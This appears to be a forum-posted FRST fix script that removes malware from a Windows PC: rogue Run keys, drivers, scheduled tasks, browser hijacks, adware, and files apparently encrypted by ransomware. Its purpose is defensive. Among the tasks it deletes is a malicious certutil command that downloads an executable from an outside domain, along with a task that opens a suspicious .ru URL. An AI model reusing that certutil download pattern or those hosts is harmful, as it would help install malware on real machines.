Posted on 21 January 2019

start::
CreateRestorePoint:
CloseProcesses:
Hosts:
RemoveProxy:
HKLM-x32\...\Run: [AVGUI.exe] => "C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\rempl\16UFQA0RNFS0NTRXEMIYY9660UG6\+RKgUAHAjp.exe [356864 2019-01-20]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [nrisk3] => rundll32.exe "C:\Users\hewou\AppData\Local\nrisk3.dll",nrisk3
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [WildFog] => C:\Windows\rss\csrss.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [CloudNet] => C:\Users\hewou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Winlogon: [Shell] "C:\Users\hewou\AppData\Roaming\D0WSaNhPfx4kukh2\Zqljw8Nc3Bzb.exe",explorer.exe
ShortcutTarget: fuguesfugues.lnk -> C:\Program Files (x86)\mattocks\Falzon.exe (Pas de fichier)
GroupPolicy: Restriction - Windows Defender
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://mysearch.avg.com/search?rvt=
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
SearchScopes: HKLM-x32 -> DefaultScope {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&pid=
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=
SearchScopes: HKLM-x32 -> {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&pid=bcu&mid=
SearchScopes: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001 -> {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=
SearchScopes: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=
OPR Extension: (Pas de nom) - C:\Users\hewou\AppData\Roaming\Opera Software\Opera Stable\Extensions\khkpnkbpjpiaccpnhgijmnlngncjlpdc
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22]
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
R2 YmZmMjdmMzBmNzRk; C:\WINDOWS\rrzyvrwrxlguvz.rrz [1213952 2019-01-20]
R1 75EAE980F475; C:\WINDOWS\75EAE980F475.sys [621928 2019-01-20]
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-21] () [Fichier non signé]
S3 FBDCCGTGWK; \??\C:\Users\hewou\AppData\Local\Temp\FBDCCGTGWK.sys [X] <==== ATTENTION
R1 Zjk3YjhmZjk5OTgyYzQz; \??\C:\WINDOWS\system32\drivers\Zjk3YjhmZjk5OTgyYzQz [X]
2019-01-21 17:12 - 2019-01-21 17:14 - 000000000 ___HD C:\Users\hewou\AppData\Roaming\D0WSaNhPfx4kukh2
2019-01-21 17:12 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\AppData\Roaming\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:13 - 000002534 _____ C:\Program Files (x86)\hr4ag4rifey.cfg.qgvioqx
2019-01-21 17:12 - 2019-01-21 17:12 - 000003026 _____ C:\Windows\System32\Tasks\PKsTXxbmnjfTBZZutgC2
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Users\hewou\AppData\Local\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\bLMoOsEEbuuGC
2019-01-21 17:11 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\AppData\Roaming\loweregcleaner
2019-01-21 17:11 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\vgjjPxjnrdvSplcncAR
2019-01-21 17:11 - 2019-01-21 17:11 - 000003212 _____ C:\Windows\System32\Tasks\GfMAIZTzcVSvml
2019-01-21 17:11 - 2019-01-21 17:11 - 000003044 _____ C:\Windows\System32\Tasks\LFgOsdPPciToq2
2019-01-21 17:11 - 2019-01-21 17:11 - 000003034 _____ C:\Windows\System32\Tasks\uivBKWbDPzuGcGhdY2
2019-01-21 17:11 - 2019-01-21 17:11 - 000003008 _____ C:\Windows\System32\Tasks\NVQvXnIpQfoDOKq2
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\ProgramData\Lavasoft
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\ProgramData\eJBlAwaaSdTwMIVB
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\WsxLtZnpU
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\OKuaQUguzkJU2
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\FVCturtSQrUn
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\eWuDAKEgxIE
2019-01-20 14:24 - 2019-01-21 17:12 - 000000000 ___HD C:\$AV_AVG
2019-01-20 14:22 - 2019-01-21 17:08 - 000000000 ____D C:\Users\hewou\AppData\Local\AVG
2019-01-20 14:21 - 2019-01-20 14:21 - 000000000 ____D C:\Windows\System32\Tasks\AVG
2019-01-20 14:21 - 2019-01-20 14:21 - 000000000 ____D C:\Program Files\Common Files\AVG
2019-01-20 14:19 - 2019-01-21 17:08 - 000000000 ____D C:\ProgramData\AVG
2019-01-20 14:19 - 2019-01-20 14:19 - 007523992 _____ (AVG Technologies CZ, s.r.o.) C:\Users\hewou\Downloads\avg_antivirus_free_setup.exe
2019-01-20 14:15 - 2019-01-20 14:15 - 000221312 ____R (AVAST Software) C:\Users\hewou\Downloads\avast_free_antivirus_setup_online.exe
2019-01-20 13:57 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\Downloads\KMSAutoNet
2019-01-20 13:56 - 2019-01-21 17:14 - 004395102 _____ C:\Users\hewou\Downloads\KMSAutoNet.zip.qgvioqx
2019-01-20 13:54 - 2019-01-20 13:58 - 125360832 _____ C:\Users\hewou\Downloads\avira_antivirus_fr-fr.exe
2019-01-20 12:28 - 2019-01-20 12:28 - 000621928 ____N (VideoDriver) C:\Windows\75EAE980F475.sys
2019-01-20 12:28 - 2019-01-20 12:28 - 000000012 _____ C:\Windows\b37887854
2019-01-20 12:21 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\Downloads\KMSPico 10.2.1 [DazTeam.NG]
2019-01-20 12:21 - 2019-01-20 13:03 - 004845352 _____ C:\Users\hewou\Downloads\KMSPico 10.2.1 [DazTeam.NG].zip.qgvioqx
2019-01-20 08:21 - 2019-01-20 13:03 - 031957619 _____ C:\Users\hewou\Downloads\CHR_Cuda426_71.zip.qgvioqx
2019-01-19 14:55 - 2019-01-19 14:55 - 001938944 _____ C:\Windows\YzFiMGE2ZTA5NTA3N.exe
2019-01-19 14:55 - 2019-01-19 14:55 - 000140008 _____ C:\Windows\system32\Drivers\Zjk3YjhmZjk5OTgyYzQz
2019-01-10 17:50 - 2019-01-21 17:01 - 000003042 _____ C:\Windows\System32\Tasks\Avast Emergency Update
C:\Program Files\rempl\16UFQA0RNFS0NTRXEMIYY9660UG6\+RKgUAHAjp.exe
C:\Windows\rss\csrss.exe
C:\Users\hewou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll
ContextMenuHandlers1: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => -> Pas de fichier
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll
ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll
Task: {0CE865A8-1BD5-4D02-8048-033FF9FF9FA2} - System32\Tasks\GfMAIZTzcVSvml => rundll32 "C:\Program Files (x86)\OKuaQUguzkJU2\HMeahMehqvZRA.dll",#1
Task: {565499FD-ABD4-4F6A-B625-FAF133AAEAB9} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe
Task: {600D157A-0BE2-4C13-8926-99C5D84D67D7} - System32\Tasks\LFgOsdPPciToq2 => C:\Windows\system32\wscript.exe "C:\ProgramData\eJBlAwaaSdTwMIVB\dygjXkd.wsf
Task: {65D24355-8BB0-4470-A86B-1FBEF02E9AF0} - System32\Tasks\uivBKWbDPzuGcGhdY2 => rundll32 "C:\Program Files (x86)\vgjjPxjnrdvSplcncAR\tNFEiXN.dll",#1
Task: {866CDFA9-9E6B-48CE-83AC-4323D5A0A18D} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe
Task: {989BB14F-EF62-4225-8C3D-339206911A44} - System32\Tasks\NVQvXnIpQfoDOKq2 => rundll32 "C:\Program Files (x86)\WsxLtZnpU\MaMhvR.dll",#1
Task: {9B1BFAB3-8347-4867-95A7-F177388AD32F} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe
Task: {B7C67212-99AE-4192-ADD3-8FC8037AADC7} - System32\Tasks\PKsTXxbmnjfTBZZutgC2 => rundll32 "C:\Program Files (x86)\bLMoOsEEbuuGC\lrmyKOi.dll",#1
Task: {CFDA0743-E2A2-4AED-8DBF-B90A85B40B07} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
Task: {DCA20AA0-BFD0-4069-B5B7-8B9DB5823AD7} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
Task: {FD7F8C51-F13C-46DB-A77D-EA7F5E2D2181} - System32\Tasks\SVC Update => C:\WINDOWS\explorer.exe "hxxp://lktoday.ru"
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe
2019-01-21 17:12 - 2019-01-21 17:12 - 000025888 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
2019-01-21 17:12 - 2019-01-21 17:12 - 000017696 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.Service.Logger.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000037664 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WcfService.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000120608 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AppCore.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000105248 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000373536 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000059168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000067360 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Events.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000084256 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SysInfo.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000057632 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.CSharp.Utilities.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000020768 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Compression.dll
IE trusted site: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\webcompanion.com -> hxxp://webcompanion.com
EmptyTemp:
cmd: ipconfig /flushdns
end::
